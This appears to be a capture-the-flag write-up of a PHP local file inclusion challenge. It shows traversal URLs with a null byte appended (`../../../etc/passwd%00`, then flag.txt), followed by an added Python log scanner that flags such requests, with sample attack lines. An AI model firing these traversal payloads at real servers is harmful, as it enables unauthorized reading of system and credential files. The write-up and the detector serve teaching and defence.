![cff1cf2aaafcfb1bea3131a056c69af3.png](d1f7ae0bf7e94fdd82a5652f2ce2ca54.png)
![965a2adeef9fc99509641b509594901a.png](bd603931bd0f490984b0691d02a53128.png)
Clicking one of the reference links changes the URL:
`jh2i.com:50010/?page=bit`
The `page` parameter looks like it selects a page that the server loads from disk, so check for local file inclusion (LFI).
![c38eb46ac57d3c70e230b33f34146106.png](8332413af78d474e9e7ccd0049f80254.png)
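No dice there. Let's append a null byte (`%00`) and see what happens. On older PHP versions a null byte truncates anything the server appends to the path, such as a file extension.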
`http://jh2i.com:50010/?page=../../../etc/passwd%00`
![80244cd1cc3846c9c40e3b57a1309690.png](816dfc2f19f44b65ba846bb87899fd6c.png)
There we go. The same request pattern works for the flag file:
`http://jh2i.com:50010/?page=../../../flag.txt%00`
![01d89e829d5fad1e2c6b71285ad875d7.png](fcb9249228124c118ee1cc57aecea4b8.png)
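
A log-review check for the requests shown above, as an added example that is not part of the original write-up: it flags query parameters that contain `..` path segments or a null byte, decoding repeatedly so double-encoded input is also caught. The log lines, IP addresses and the `ref` parameter are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (common log format), not from the challenge server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=bit HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=../../../etc/passwd HTTP/1.1" 200 498',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /?page=../../../etc/passwd%00 HTTP/1.1" 200 1324',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /?page=..%252f..%252fflag.txt%2500 HTTP/1.1" 200 40',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /?page=byte&ref=v1..2 HTTP/1.1" 200 530',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(line):
    """Return a list of (parameter, reason) findings for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        if "\x00" in value:
            findings.append((name, "null byte"))
        # Compare whole path segments so a value like "v1..2" is not flagged.
        segments = re.split(r"[\\/]", value.replace("\x00", ""))
        if ".." in segments:
            findings.append((name, "path traversal"))
    return findings


def scan(lines):
    """Map line index -> findings for every line with at least one finding."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_request(line))}


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG).items():
        print(index, findings)
```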
---
Tags: #ctf #file_inclusion #lfi #php #nullbyte #web